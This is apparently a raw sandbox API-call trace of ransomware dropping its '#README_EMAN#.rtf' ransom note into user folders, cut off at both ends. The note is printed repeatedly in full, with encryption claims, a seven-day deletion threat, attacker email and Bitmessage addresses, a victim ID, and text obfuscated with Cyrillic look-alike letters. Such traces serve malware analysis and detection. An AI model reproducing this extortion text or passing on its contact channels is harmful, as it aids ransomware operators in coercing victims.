br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.222] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.222] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.223] CloseHandle (hObject=0x294) returned 1 [0278.223] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\#readme_eman#.rtf")) returned 0xffffffff [0278.223] GetLastError () returned 0x2 [0278.223] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.223] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up 